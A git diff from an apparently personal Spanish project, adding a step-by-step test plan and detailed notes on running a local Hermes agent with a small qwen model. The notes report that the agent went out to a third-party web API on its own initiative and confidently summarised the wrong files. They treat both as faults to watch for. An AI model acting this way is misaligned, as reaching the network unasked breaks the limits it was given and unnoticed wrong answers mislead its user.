_ganchos(solo_publico=False): return ganchos -def _instalado(): - """Las aplicaciones instaladas en esta maquina (instalado.py). Personal.""" - try: - try: - from saber import instalado - except ImportError: - import instalado - except ImportError: - return [] - fragmentos = [] - for e in instalado.entradas(): - e.pop("publico", None) - fragmentos.append(e) - return fragmentos - - -# Repos de ~/COFRE/CODERS cuyos docs (markdown) vale la pena indexar aunque no -# sean un perfil de COFRE. Personal: son herramientas de terceros clonadas aqui. -DOCS_REPOS = [ - ("strix", "PENTESTERS", ["README.md", "AGENTS.md", "docs", "benchmarks"]), -] - - -def _docs_extra(): - """Docs markdown de herramientas clonadas en CODERS (strix, etc.). Personal.""" - coders = os.path.join(COFRE, "CODERS") - fragmentos = [] - for nombre, perfil, rutas in DOCS_REPOS: - base = os.path.join(coders, nombre) - if not os.path.isdir(base): - continue - ficheros = [] - for r in rutas: - p = os.path.join(base, r) - if os.path.isfile(p) and p.endswith(".md"): - ficheros.append(p) - elif os.path.isdir(p): - for raiz, dirs, fs in os.walk(p): - if IGNORA.search(raiz): - dirs[:] = [] - continue - ficheros += [os.path.join(raiz, f) for f in fs if f.endswith(".md")] - for doc in ficheros: - for trozo in trocea(doc): - fragmentos.append({ - "tipo": "metodologia", "herramienta": nombre, "perfil": perfil, - "tema": nombre, "fichero": os.path.relpath(doc, coders), - "texto": trozo}) - return fragmentos - - def _conocimiento(): """El pack de metodologia y manuales que viene con el repo (conocimiento/).""" fragmentos = [] @@ -376,24 +325,14 @@ def construye(solo_cuenta=False, solo_cofre=False): if catalogo: print(f" CATALOGO {len(catalogo):5d} fragmentos (awesome lists)") - instalado = _instalado() - if instalado: - print(f" INSTALADO {len(instalado):5d} apps/paquetes de esta maquina") - - docs_extra = _docs_extra() - if docs_extra: - print(f" DOCS-CODERS {len(docs_extra):5d} fragmentos (strix, etc.)") - ganchos = _ganchos(solo_publico=False) if ganchos: print(f" GANCHOS {len(ganchos):5d} preguntas sintetizadas") - todo = (fichas + fragmentos + sistema + conocimiento + catalogo - + instalado + docs_extra + ganchos) + todo = fichas + fragmentos + sistema + conocimiento + catalogo + ganchos print(f"\n total: {len(fichas)} fichas + {len(fragmentos)} apuntes + " f"{len(sistema)} sistema + {len(conocimiento)} conocimiento + " - f"{len(catalogo)} catalogo + {len(instalado)} instalado + " - f"{len(docs_extra)} docs + {len(ganchos)} ganchos = {len(todo)} entradas") + f"{len(catalogo)} catalogo + {len(ganchos)} ganchos = {len(todo)} entradas") if solo_cuenta: return 0 diff --git a/nucleo/saber/instalado.py b/nucleo/saber/instalado.py deleted file mode 100755 index 3d4aa06..0000000 --- a/nucleo/saber/instalado.py +++ /dev/null @@ -1,140 +0,0 @@ -#!/usr/bin/env python3 -"""Indexa las aplicaciones instaladas en ESTA maquina: que hay y para que sirve. - - ./instalado.py di cuantas entradas saldrian - ./instalado.py --volcado imprime unas cuantas de muestra - -Dos fuentes, ambas locales: - 1. Los .desktop (/usr/share/applications, ~/.local, flatpak): las apps que el - usuario ve y lanza, con su nombre, para que sirven (Comment) y el comando. - 2. Los paquetes que el usuario instalo a mano (apt-mark showmanual), con su - descripcion de una linea. No las dependencias: eso es ruido. - -Es privado por definicion β€”dice que software tiene esta maquinaβ€”, asi que -indexa.py lo mete SOLO en el indice personal, nunca en el publico ni en gitea. -""" -import glob -import os -import re -import subprocess -import sys - -DIRS_DESKTOP = [ - "/usr/share/applications", - os.path.expanduser("~/.local/share/applications"), - "/var/lib/flatpak/exports/share/applications", - os.path.expanduser("~/.local/share/flatpak/exports/share/applications"), - "/var/lib/snapd/desktop/applications", -] - - -def _campo(texto, clave): - m = re.search(r"^%s=(.+)$" % re.escape(clave), texto, re.M) - return m.group(1).strip() if m else "" - - -def _apps_desktop(): - vistos = set() - for d in DIRS_DESKTOP: - for ruta in sorted(glob.glob(os.path.join(d, "*.desktop"))): - base = os.path.basename(ruta) - if base in vistos: - continue - vistos.add(base) - try: - with open(ruta, encoding="utf-8", errors="ignore") as f: - txt = f.read() - except OSError: - continue - if _campo(txt, "NoDisplay").lower() == "true": - continue - nombre = _campo(txt, "Name") - if not nombre: - continue - comentario = _campo(txt, "Comment") or _campo(txt, "GenericName") - categorias = _campo(txt, "Categories").replace(";", ", ").strip(", ") - exe = re.sub(r"%[a-zA-Z]", "", _campo(txt, "Exec")).strip() - cmd = exe.split()[0] if exe else "" - partes = [f"{nombre}"] - if comentario: - partes.append(f"β€” {comentario}") - if cmd: - partes.append(f"(se lanza con: {cmd})") - if categorias: - partes.append(f"[{categorias}]") - yield { - "tipo": "instalado", "herramienta": nombre, "perfil": "SISTEMA", - "publico": False, "tema": categorias.lower(), - "fichero": f"app instalada: {base}", - "texto": "Aplicacion instalada: " + " ".join(partes), - } - - -def _paquetes_manuales(): - """Los paquetes apt que instalo el usuario (no dependencias), con su resumen.""" - try: - man = subprocess.run(["apt-mark", "showmanual"], capture_output=True, - text=True, timeout=30).stdout.split() - except (OSError, subprocess.SubprocessError): - return - if not man: - return - # resumen de cada uno en un solo dpkg-query (rapido) - try: - salida = subprocess.run( - ["dpkg-query", "-W", "-f=${Package}\t${binary:Summary}\n", *man], - capture_output=True, text=True, timeout=60).stdout - except (OSError, subprocess.SubprocessError): - return - lineas = [] - for l in salida.splitlines(): - if "\t" not in l: - continue - pkg, resumen = l.split("\t", 1) - if resumen.strip(): - lineas.append(f"{pkg}: {resumen.strip()}") - # se agrupan en fragmentos (no una entrada por paquete: son cientos) - buffer = "Paquetes que el usuario instalo a mano en esta maquina:\n" - for ln in lineas: - if len(buffer) + len(ln) > 1100 and buffer: - yield _pkg_entry(buffer) - buffer = "Paquetes instalados (cont.):\n" - buffer += "- " + ln + "\n" - if buffer.strip(): - yield _pkg_entry(buffer) - - -def _pkg_entry(texto): - return {"tipo": "instalado", "herramienta": "paquetes apt", "perfil": "SISTEMA", - "publico": False, "tema": "paquetes", "fichero": "apt-mark showmanual", - "texto": texto.strip()} - - -def entradas(): - yield from _apps_desktop() - yield from _paquetes_manuales() - - -def main(): - import argparse - p = argparse.ArgumentParser() - p.add_argument("--volcado", action="store_true") - a = p.parse_args() - apps = pkgs = 0 - muestras = [] - for e in entradas(): - if e["herramienta"] == "paquetes apt": - pkgs += 1 - else: - apps += 1 - if len(muestras) < 6: - muestras.append(e) - print(f" {apps} apps (.desktop) + {pkgs} fragmentos de paquetes apt") - if a.volcado: - for e in muestras: - print(" -", e["texto"][:160].replace("\n", " ")) - return 0 - - -if __name__ == "__main__": - sys.exit(main()) diff --git a/verde/ESCALERA.md b/verde/ESCALERA.md new file mode 100644 index 0000000..1f340fb --- /dev/null +++ b/verde/ESCALERA.md @@ -0,0 +1,224 @@ +# La escalera del primer arranque + +Lo que `pruebas/` no puede contestar. Las siete comprobaciones automΓ‘ticas dicen +que las piezas estΓ‘n donde tienen que estar; esto dice si **sirve**, y eso solo +lo juzga alguien escuchando y leyendo. + +Se sube **en orden y se para en el primer escalΓ³n que falle**. Es a propΓ³sito: +el escalΓ³n que falla es el que informa, y seguir subiendo con uno roto convierte +un fallo de una lΓ­nea en una tarde de adivinar. + +Antes de empezar: + +```bash +./verde/arrancar.sh # mide, configura y dictamina +./verde/pruebas/ejecutar.sh # las 7; ninguna abre el TUI +./verde/verde-launcher.sh # el TUI, en verde fosforo +``` + +Los tiempos se anotan aquΓ­ mismo. El del naranja estΓ‘ para comparar, pero **lΓ©ete +antes el aviso del final**: hoy no miden lo mismo. + +Los escalones 1 a 4 tambiΓ©n se pueden pasar sin abrir el TUI, que es como se +subieron la primera vez: + +```bash +hermes -z "hola, ΒΏquiΓ©n eres?" # una pregunta y a callar +``` + +Y para ver **quΓ© herramientas llamΓ³ de verdad**, que `-z` no enseΓ±a: + +```bash +python3 -c " +import sqlite3 +c = sqlite3.connect('file:$HOME/.hermes/state.db?mode=ro', uri=True) +for r in c.execute('SELECT role, tool_name, tool_calls, content FROM messages ORDER BY rowid DESC LIMIT 10'): + print(r) +" +``` + +Sin eso, un fallo de rutas se atribuye al modelo. PasΓ³, y estΓ‘ contado en el +escalΓ³n 3. + +--- + +## 1 Β· Que conteste + +> hola, ΒΏquiΓ©n eres? + +Contesta que **el endpoint responde y el prompt fijo cabe**. No prueba nada mΓ‘s: +aquΓ­ no hay herramientas ni memoria, es la seΓ±al de vida. + +| | | +|---|---| +| Tiempo | _______ | +| ΒΏSe presenta como asistente, sin inventarse una identidad rara? | _______ | + +Si falla: no es cosa de Hermes. Vuelve a `arrancar.sh`, que separa el modelo del +arnΓ©s. + +--- + +## 2 Β· Una herramienta, la mΓ‘s simple + +> ΒΏcuΓ‘nto espacio libre queda en el disco? + +Primera llamada real. Tiene que **ejecutar `df`**, no describir cΓ³mo se ejecuta +`df`. Un modelo que explica el comando en vez de llamarlo ha entendido la +pregunta y ha fallado la tarea. + +| | | +|---|---| +| Tiempo | _______ | +| ΒΏLlama a la herramienta o lo cuenta en prosa? | _______ | +| ΒΏEl nΓΊmero coincide con `df -h /`? | _______ | + +--- + +## 3 Β· Leer un fichero + +> lee verde/README.md y resΓΊmelo en una lΓ­nea + +Otra familia de herramienta (ficheros, no terminal) y, de paso, si el resumen +tiene que ver con lo que pone el fichero o se lo inventa a partir del nombre. + +| | | +|---|---| +| Tiempo | _______ | +| ΒΏEl resumen se parece al fichero de verdad? | _______ | + +**Si el resumen no pega ni con cola, mira el directorio antes que el modelo.** +La primera vez que se subiΓ³ esta escalera, este escalΓ³n devolviΓ³ un resumen +perfecto de Gitleaks. No era una alucinaciΓ³n: el agente arranca en `$HOME`, asΓ­ +que resolviΓ³ `verde/README.md` contra `~`, donde efectivamente hay un +`README.md` β€” el de Gitleaks. Lo leyΓ³ entero y lo resumiΓ³ bien. + +Es un fallo traicionero porque **no deja ni un error**: la herramienta se +ejecuta, devuelve un fichero de verdad y el modelo acierta el resumen. Solo que +no es el fichero que pediste. + +Ni el `cd` delante ni `--in DIR` lo arreglan (`--in` se ignora en modo `-z`). Lo +que lo arregla es `terminal.cwd` en `~/.hermes/config.yaml`, ya puesto y +comprobado por `pruebas/03_config.sh`. El detalle, en `NOTAS.md`. + +--- + +## 4 Β· Encadenar β€” **el escalΓ³n que importa** + +> dime cuΓ‘l de los .md de verde/ es el mΓ‘s largo + +AquΓ­ se separa un chatbot de un agente. No hay una herramienta que conteste esto: +hay que **listar, medir y razonar sobre el resultado de la vuelta anterior**, y +decidir cuΓ‘ndo se ha terminado. + +Es el escalΓ³n que mΓ‘s probabilidades tiene de romperse en un 4B, y el que +justifica el carril entero: si esto sale, el arnΓ©s aporta algo sobre el nΓΊcleo. + +| | | +|---|---| +| Tiempo | _______ | +| NΓΊmero de vueltas que da | _______ | +| ΒΏAcierta el fichero? (comprueba con `wc -c verde/*.md`) | _______ | +| ΒΏSe queda en bucle o sabe parar? | _______ | + +--- + +## 5 Β· Una skill + +> _(algo que dispare una de las skills instaladas; `hermes skills list` las lista)_ + +El paso del vΓ­deo que el nΓΊcleo no tiene. Lo que se mira no es que la skill +funcione β€”eso es de quien la escribiΓ³β€” sino si el modelo **decide sola** que esa +skill viene a cuento. + +| | | +|---|---| +| Skill probada | _______ | +| ΒΏLa eligiΓ³ sin que se la nombraras? | _______ | +| **ΒΏSaliΓ³ a la red para resolverlo?** | _______ | + +**Esa tercera fila se aΓ±adiΓ³ despuΓ©s de subir la escalera la primera vez, y es +la que mΓ‘s pesa.** PidiΓ©ndole un cartel en ASCII, el agente eligiΓ³ la skill solo +β€”bienβ€”, descubriΓ³ que `pyfiglet` no estaba instalado y **se fue a una API de +terceros por su cuenta**, sin que nadie le dijera que podΓ­a. + +AsΓ­ que al probar una skill, mira siempre las llamadas, no solo el resultado: + +```bash +ss -tnp | grep -v 127.0.0.1 # mientras corre +``` + +NingΓΊn ajuste lo impide: el agente tiene terminal y la terminal tiene `curl`. +Es la contrapartida de lo que hace valioso este carril, y estΓ‘ desarrollado en +`NOTAS.md`. + +--- + +## 6 Β· Que hable + +> _(cualquier respuesta, con el TTS puesto)_ + +Tiene que sonar **exactamente igual que el naranja**: mismo Piper 1.2.0 MIT, +mismo `es_ES-davefx-medium`, mismo tono 1.0. `pruebas/07_voz.sh` ya comprueba +que el fichero sale a 22050 Hz mono y con la voz del nΓΊcleo; lo que falta es tu +oΓ­do en la cadena entera, dentro de Hermes y no llamando al script a mano. + +| | | +|---|---| +| ΒΏSuena igual que el naranja? | _______ | +| ΒΏCorta frases o se come el final? | _______ | + +--- + +## 7 Β· Que escuche β€” **el ΓΊltimo, y por un motivo** + +> _(dictar una orden por micrΓ³fono)_ + +Va el ΓΊltimo porque es el que puede tirar todo lo demΓ‘s. whisper `small` pide +**839 MiB en el pico de la transcripciΓ³n** β€”no en reposo, que fue el error de +medida que costΓ³ una tardeβ€” contra una tarjeta que ya tiene el modelo dentro. + +| | | +|---|---| +| ΒΏTranscribe? | _______ | +| Tiempo de la primera (arranca el servidor, ~4 s) | _______ | +| Tiempo de las siguientes | _______ | + +Si sale `CUDA error: out of memory`, **no es un fallo nuevo**: es el mismo +reparto que documenta el README del naranja. Salidas por orden: + +1. Fiarse de `stt.local.unload_after_idle_seconds: 300`, que ya estΓ‘ puesto: + whisper suelta la VRAM tras cinco minutos de silencio. +2. Bajar el modelo de escucha a `base` (80 % de acierto en vez de 93 %). +3. Probar la escucha con el modelo de texto descargado (`ollama stop`). + +Y recuerda que el envoltorio `~/.local/bin/whisper-server` del naranja ya tiene +la red de seguridad: por debajo de 950 MiB libres arranca en CPU (2,17 s en vez +de 1,05) en vez de morirse. + +--- + +## Antes de comparar los dos carriles + +**El verde va a medir mΓ‘s lento, y no serΓ‘ culpa del modelo.** + +El naranja tiene **150 acciones rΓ‘pidas que se saltan el cerebro**: "ΒΏcuΓ‘nto +espacio queda?" es un `df` directo, no una inferencia. En Hermes no existe ese +atajo β€” toda orden pasa por el modelo, con las 19 herramientas, las skills y la +memoria en contexto **en cada vuelta**. + +Comparar el escalΓ³n 2 contra el naranja es comparar una inferencia contra un +`df`. Para comparar de verdad hacen falta frases que en el naranja **tambiΓ©n** +acaben en el cerebro: estΓ‘n en `config/jarvis-sin-accion.jsonl`. + +## Al terminar, devolver la mΓ‘quina a su sitio + +```bash +./verde/verde-launcher.sh --stop +ollama stop qwen3.5:4b-verde +./nucleo/arranca.sh # el naranja, como siempre +``` + +Y comprobar que el naranja vuelve con su VRAM de siempre. `pruebas/02_modelo.sh` +del verde ya verifica que sus cuatro parΓ‘metros siguen intactos, pero eso mira el +Modelfile, no que arranque. diff --git a/verde/NOTAS.md b/verde/NOTAS.md new file mode 100644 index 0000000..7d7ba7c --- /dev/null +++ b/verde/NOTAS.md @@ -0,0 +1,865 @@ +# Notas del carril verde + +Lo medido, lo resuelto y lo que queda abierto. + +Fechas: 15 de agosto de 2026 (instalaciΓ³n, en frΓ­o) y **16 de agosto (primer +arranque real)**. Lo de la primera fecha salΓ­a de leer cΓ³digo y mirar el disco; +lo de la segunda estΓ‘ ejecutado. + +## EL SUELO DE 64k: el tope que invalidΓ³ la medida anterior (16 ago) + +*(Esto va primero porque cambia la conclusiΓ³n de la secciΓ³n siguiente.)* + +`arrancar.sh` midiΓ³ bien: **24576 era el mayor contexto que cabΓ­a** en la GPU +con las 32 capas en la tarjeta, 3301 MiB, y con eso el modelo emitΓ­a `tool_calls` +vΓ‘lidos. Todo correcto y todo inΓΊtil, porque al abrir Hermes: + +``` +Model qwen3.5:4b-verde has a context window of 24,576 tokens, which is below +the minimum 64,000 required by Hermes Agent. +``` + +Es un **tope duro del arnΓ©s**, no un aviso: `agent/model_metadata.py:405`, +`MINIMUM_CONTEXT_LENGTH = 64_000`, comprobado en `agent/agent_init.py:2656`. +No se ve en frΓ­o β€” `hermes prompt-size` no lo menciona β€” y solo salta al +construir el agente. + +### Las dos salidas que se descartaron, y por quΓ© + +1. **La puerta de atrΓ‘s de `lmstudio`.** El mismo `if` se salta si + `provider == "lmstudio"` y `context_length` estΓ‘ puesto a mano. No se usa: ese + proveedor llama a `{server}/api/v1/models`, la API **nativa de LM Studio**, + que ollama no tiene, y ademΓ‘s intenta precargar el modelo por su cuenta + (`ensure_lmstudio_model_loaded`). Fingir ser otro servidor romperΓ­a mΓ‘s + adelante y de forma mΓ‘s confusa. +2. **Mentir en el `config.yaml`** poniendo 64000 con el modelo a 24576. Es la + peor de las tres: Hermes creerΓ­a tener 64k, **no comprimirΓ­a** hasta + acercarse, y ollama irΓ­a tirando los tokens mΓ‘s viejos β€” que son el prompt de + sistema y los esquemas de las 19 herramientas. El sΓ­ntoma serΓ­a que el agente + deja de llamar herramientas a mitad de sesiΓ³n, **sin un solo error en el log**. + +### Lo que se hizo: subir el contexto de verdad y pagar capas + +Con `num_ctx 65536` fijo, medido el 16 de agosto: + +| `num_gpu` | Resultado | En tarjeta | Total | +|---|---|---|---| +| 32 | `cudaMalloc failed` | β€” | β€” | +| 24 | `cudaMalloc failed` | β€” | β€” | +| **16** | **carga** | **2795 MiB** | 5784 MiB | +| 8 | carga | 1772 MiB | 5784 MiB | +| 0 | carga | 0 MiB | 5368 MiB | + +O sea que 64k **sΓ­ cabe en esta mΓ‘quina**, pero con **la mitad de la red en la +CPU** y unos 3 GB en RAM. Lo que eso cuesta en tiempo estΓ‘ mΓ‘s abajo, en +"CuΓ‘nto tarda de verdad". + +La palanca para recuperar capas β€”`OLLAMA_FLASH_ATTENTION=1` + +`OLLAMA_KV_CACHE_TYPE=q8_0`, que parte el KV cachΓ© por la mitadβ€” **sigue sin +aplicarse**: es del servicio de ollama, no del modelo, y afectarΓ­a tambiΓ©n al +naranja. Esa decisiΓ³n es del usuario. + +**LecciΓ³n de mΓ©todo**, que es la misma que ya aparece dos veces en este fichero: +se midiΓ³ a fondo el lΓ­mite de la *mΓ‘quina* y no se comprobΓ³ el lΓ­mite del +*software que iba encima*. Los dos son topes; solo uno se estaba mirando. + +## CuΓ‘nto tarda de verdad (16 ago) + +Medido con `hermes -z`, que es una pregunta y a callar, contra el modelo a +`num_ctx 65536` con 16 de 32 capas en GPU. + +| EscalΓ³n | Vueltas | Tiempo | +|---|---|---| +| 1 Β· "hola, ΒΏquiΓ©n eres?" β€” **en frΓ­o** | 0 herramientas | **2 min 38 s** | +| 2 Β· "ΒΏcuΓ‘nto espacio libre queda?" | 1 herramienta | **48,6 s** | +| 3 Β· "lee verde/README.md y resΓΊmelo" | 4 (dos fallidas + recuperaciΓ³n) | **3 min 29 s** | +| 3 bis Β· igual, con `terminal.cwd` arreglado | 1 | **1 min 58 s** | +| 3 ter Β· igual, ya con `AGENTS.md` | 2 (una fallida + recuperaciΓ³n) | **4 min 54 s** | +| 4 Β· "cuΓ‘l de los .md de verde/ es el mΓ‘s largo" | 4 encadenadas | **3 min 54 s** | +| 5 Β· "un cartel en arte ascii que ponga JARVIS" | 3 (una saliΓ³ a la red) | **4 min 58 s** | +| 6 Β· "di en voz alta…" | 1 (`text_to_speech`) | **3 min 37 s** | +| *(pwd suelto, cachΓ© caliente, una llamada)* | 1 | **13,2 s** | + +**Esa diferencia de tres veces no es ruido, y es lo mΓ‘s ΓΊtil que se midiΓ³.** El +primer turno paga el prefill entero de los ~20.500 tokens del prompt fijo con +media red en la CPU. A partir de ahΓ­, ollama **cachea el prefijo** y las vueltas +siguientes solo procesan lo nuevo β€” y eso que la 2 hace *dos* llamadas al modelo +(pedir la herramienta y redactar con su resultado) y aun asΓ­ tarda un tercio. + +O sea que la cifra que importa para decidir si esto se usa **no es la del primer +arranque**. Es la de rΓ©gimen. Igual que la primera transcripciΓ³n de whisper +tarda ~4 s por arrancar el servidor y luego se queda en ~930 ms. + +El escalΓ³n 2 acertΓ³, ademΓ‘s: `663G` libres de `1,9T` al `63 %`, que es +exactamente lo que dice `df -h /`. + +**Y el 3 enseΓ±Γ³ algo que no se estaba buscando.** FallΓ³ dos veces seguidas β€” +partiΓ³ mal la frase y pidiΓ³ `cat ~/lee-verde/README.md`, que no +existeβ€” y en vez de inventarse una respuesta cambiΓ³ de estrategia: `search_files` +para localizar el fichero, y `read_file` con la ruta absoluta ya correcta. El +resumen final es fiel al README. + +Eso es exactamente lo que se venΓ­a a probar de este carril: **recuperarse de una +herramienta que devuelve error**. El nΓΊcleo naranja, con sus acciones rΓ‘pidas, o +acierta a la primera o no hay segunda. Las dos vueltas de mΓ‘s son las que +explican los 3 min 29 s. + +### El punto flaco del 4B: las rutas relativas + +Con `terminal.cwd` ya arreglado se repitiΓ³ el escalΓ³n 3, y saliΓ³ **peor**: +**1 min 58 s** y una sola llamada, `read_file` sobre +`COFRE/CODERS/JARVIS/README.md`. **Se comiΓ³ el `verde/`.** ResumiΓ³ el README de +la raΓ­z β€”el del proyecto enteroβ€” con un "JARVES" de propina y la frase cortada a +medias. + +La comparaciΓ³n entre las dos pasadas es lo interesante: + +| | Ruta base | QuΓ© hizo | Resultado | +|---|---|---|---| +| Con `cwd` en `$HOME` | mal | fallΓ³, buscΓ³, se corrigiΓ³ | **acertΓ³** | +| Con `cwd` en el repo | bien | fue directo a una ruta plausible | **fallΓ³** | + +O sea: **cuando la herramienta le devuelve un error, se recupera; cuando le +devuelve un fichero que existe pero no es el pedido, no tiene forma de notarlo** +y lo resume tan campante. Es el mismo patrΓ³n del error de `~/README.md`, +y la razΓ³n de que estos fallos no se vean: no hay error que mirar. + +Lo que apunta a la mejora obvia si este carril sigue adelante: un `AGENTS.md` en +la raΓ­z del repo describiendo la disposiciΓ³n de carpetas. Hermes ya carga +ficheros de contexto, asΓ­ que el sitio estΓ‘. + +#### Escrito el `AGENTS.md`, el escalΓ³n 3 pasa β€” pero no por lo que parece + +Se escribiΓ³ (`/AGENTS.md`: los tres carriles, el Γ‘rbol de carpetas y la +regla de que las rutas relativas salen de la raΓ­z del repo). Cuesta **2.490 B** +del prompt fijo, que sube a 84.740 B β‰ˆ **21.185 tokens** de los 65.536: quedan +44.351 para conversar. + +Tercera pasada del escalΓ³n 3, **4 min 54 s**, y el resumen es del fichero +correcto por fin. Recoge incluso el aviso de la fuga a internet que se aΓ±adiΓ³ +hoy al README. + +**Pero el modelo volviΓ³ a alucinar la ruta.** Su primera llamada fue + + read_file ~/COFRE/CODERS/JARVIS-verde/zapier-connection.py + +que no existe y no se parece a nada de lo pedido. RecibiΓ³ `File not found` y +**entonces** acertΓ³ con `JARVIS/verde/README.md`. + +O sea que el `AGENTS.md` **no evitΓ³ el disparate; le dio con quΓ© recuperarse**. +Es la tercera vez que sale el mismo patrΓ³n en esta sesiΓ³n y ya no es anΓ©cdota: + +| Lo que recibe la herramienta | QuΓ© hace el 4B | +|---|---| +| Un **error** | cambia de estrategia y suele acertar | +| Un fichero **que existe pero no es** | lo resume tan contento | + +La lecciΓ³n prΓ‘ctica para este carril: **mΓ‘s vale una ruta que falle que una que +acierte por accidente.** Y en la prosa sigue descuidado β€” aquΓ­ se inventΓ³ un +"98 % local", llamΓ³ API de terceros a `pyfiglet` (que es una librerΓ­a local; la +API era `asciified.thelicato.io`) y le dio la vuelta a la frase del objetivo. + +### El escalΓ³n 4, que era el que decidΓ­a: **pasa** + +*"dime cuΓ‘l de los .md de la carpeta verde/ es el mΓ‘s largo"* β€” **3 min 54 s**, +cuatro llamadas encadenadas, respuesta correcta: + +| # | Llamada | QuΓ© pasΓ³ | +|---|---|---| +| 1 | `search_files` con `pattern: "*.md"` | `rg: regex parse error` | +| 2 | `search_files` con `pattern: "\\.md$"` | **corrigiΓ³ el patrΓ³n Γ©l solo** | +| 3 | `terminal`: `find … -name "*.md"` | los cinco ficheros | +| 4 | `terminal`: bucle con `wc -l` sobre cada uno | las cinco cifras | + +Y concluyΓ³: `verde/NOTAS.md` con 625 lΓ­neas. Es el correcto. + +**Esto es lo que justificaba el carril entero.** No hay una herramienta que +conteste esa pregunta: hay que listar, medir y razonar sobre el resultado de la +vuelta anterior, y saber cuΓ‘ndo parar. El nΓΊcleo naranja no puede hacerlo β€” sus +150 acciones rΓ‘pidas o aciertan a la primera o no hay segunda. + +La letra pequeΓ±a, que no cambia el veredicto pero conviene tener escrita: al +enumerar los ficheros los ordenΓ³ mal (puso PLAN-ARRANQUE con 181 por encima de +ESCALERA con 208) y etiquetΓ³ el README de `verde/` como *"categorΓ­a raΓ­z"*. O +sea que **el razonamiento de la cadena es bueno y la prosa de alrededor es +descuidada**. Para una orden hablada da igual; para un informe, no. + +## EL BLOQUEO DEL ARRANQUE: no cabe la pregunta + +*(15 ago, tarde. Esto es lo mΓ‘s importante del fichero.)* + +Se preparΓ³ el primer arranque y apareciΓ³ un tope que no era el que se +anticipaba. **No es que `qwen3.5:4b` no sepa llamar herramientas: es que no le +cabe la pregunta.** Medido con `hermes prompt-size`: + +| | | +|---|---| +| Prompt de sistema de Hermes | 26.281 B | +| Esquemas de las 19 herramientas | 55.978 B | +| **Fijo, antes de decir nada** | **82.259 B β‰ˆ 20.500 tokens** | +| `num_ctx` de `qwen3.5:4b-jarvis` | **4.096** | + +Cinco veces por encima. Y hay un segundo tope escondido: **`num_predict 300`, +que el naranja hereda del modelo BASE** (no lo pone su Modelfile). 300 tokens +cortan el JSON de una llamada a herramienta por la mitad. + +Los dos estΓ‘n **bien puestos para el naranja** β€”respuestas habladas cortas, VRAM +para whisperβ€” y son justo lo contrario de lo que pide un arnΓ©s agΓ©ntico. + +Y encima, la trampa que avisaba la documentaciΓ³n: `/api/show` reporta +`qwen35.context_length = 262144`, el mΓ‘ximo del modelo, **no** los 4096 +configurados. Hermes se habrΓ­a creΓ­do que tenΓ­a 262k. El sΓ­ntoma habrΓ­a sido +respuestas truncadas y llamadas rotas, y la conclusiΓ³n natural β€”"el 4B no vale +para esto"β€” **habrΓ­a sido falsa**. + +### La variante verde, ya creada + +`verde/qwen3.5-4b-verde.Modelfile` β†’ `ollama create qwen3.5:4b-verde`. +**`qwen3.5:4b-jarvis` no se tocΓ³.** + +| ParΓ‘metro | Valor | Por quΓ© | +|---|---|---| +| `num_gpu` | 32 | todas las capas, con el naranja cerrado | +| `num_ctx` | 24576 | 32768 no cabe (ver abajo) | +| `num_predict` | 4096 | 300 cortarΓ­a una tool call | +| `temperature` | 0.2 | emitir JSON no es escribir prosa | + +**Trampa del Modelfile:** ollama **no admite comentarios en la misma lΓ­nea** que +un `PARAMETER`. Esto falla: + +``` +PARAMETER num_gpu 32 # todas las capas +β†’ Error: invalid int value [32 # todas las capas] +``` + +Los comentarios van en su propia lΓ­nea. + +### Lo medido de VRAM + +| ConfiguraciΓ³n | Resultado | +|---|---| +| `num_ctx 32768`, 32 capas | **`cudaMalloc failed: out of memory`** | +| `num_ctx 24576`, 32 capas | **pendiente**: hay que medirlo con la tarjeta libre | + +Escalera si 24576 tampoco entra, en orden de menos a mΓ‘s invasivo: `num_ctx +16384` (el suelo: por debajo no cabe el prompt fijo con holgura) β†’ `num_gpu 24` +β†’ `OLLAMA_FLASH_ATTENTION=1` + `OLLAMA_KV_CACHE_TYPE=q8_0`. + +**Cuidado con el ΓΊltimo:** `OLLAMA_KV_CACHE_TYPE` es del **servicio**, no del +modelo. Se pone en el systemd de ollama y **afectarΓ­a tambiΓ©n al naranja** la +prΓ³xima vez que arranque. Si se usa, hay que anotarlo aquΓ­ y en el Modelfile del +naranja. + +### Desde dΓ³nde se lanza importa, y mucho + +| Directorio de arranque | Prompt de sistema | +|---|---| +| `~/COFRE/CODERS/JARVIS` | 26.281 B | +| `~/.hermes/hermes-agent` | **55.261 B** | + +La diferencia son 30 KB: el `AGENTS.md` de 81 KB del **propio repo de Hermes**, +que se cuela como fichero de contexto y encima sale truncado con un aviso. A +mano es fΓ‘cil olvidarlo y sacar medidas que no comparan nada. + +### Y el `cd` NO basta (16 ago) + +Esto se descubriΓ³ subiendo la escalera y es peor que lo anterior, porque **no +deja ni un error**. `verde-launcher.sh` hacΓ­a `cd "$RAIZ"` antes de llamar a +Hermes, que parece suficiente y no lo es: **Hermes restaura el directorio de +trabajo apuntado en la sesiΓ³n** y se salta aquel desde el que lo lanzas. + +El sΓ­ntoma: se le pide *"lee verde/README.md y resΓΊmelo en una lΓ­nea"* y +devuelve + +> **Gitleaks es una herramienta SAST diseΓ±ada para detectar y prevenir secretos +> codificados a mano en repositorios git.** + +Parece el modelo alucinando de manera espectacular. No lo es. En la base de +sesiones se ve la llamada real: + +``` +terminal {"command": "cat ~/README.md | head -50"} +``` + +ResolviΓ³ `verde/README.md` contra `~`, ahΓ­ hay un `README.md` que es el +de Gitleaks, lo leyΓ³ entero y lo resumiΓ³ **bien**. La herramienta funcionΓ³, el +modelo entendiΓ³, el resumen es correcto β€” y la respuesta es inΓΊtil. + +### Lo que NO lo arregla, probado + +**`--in DIR` no vale en modo `-z`.** Parece la bandera exacta β€”entra en el +directorio *y* se salta la restauraciΓ³n, mientras que `--no-restore-cwd` solo +hace lo segundoβ€” y con ella el fallo se repitiΓ³ igual. El motivo estΓ‘ en +`hermes_cli/main.py:11324`: el modo de una sola pregunta sale por +`_run_and_exit_oneshot(...)` y **termina el proceso ahΓ­**, sin llegar nunca a +`cmd_chat`, que es la ΓΊnica funciΓ³n donde se atiende `--in`. Se ignora en +silencio. En el TUI sΓ­ funciona, y por eso `verde-launcher.sh` la pasa. + +**Un `cd` delante tampoco.** Comprobado del modo mΓ‘s directo posible: + +``` +pwd del shell : ~/COFRE/CODERS/JARVIS +pwd del agente : ~ +``` + +Y no es que el modelo se lo invente: el `ls -d */` que ejecutΓ³ por su cuenta +devolviΓ³ `BIKEPARK/ COFRE/ ctf/ Downloads/…`, o sea el `$HOME` de verdad. + +### Lo que sΓ­ lo arregla + +`terminal.cwd` en `~/.hermes/config.yaml`, que de fΓ‘brica viene como `"."` y +que su propia documentaciΓ³n describe como *"el directorio actual donde ejecutas +hermes"*. **No lo es.** + 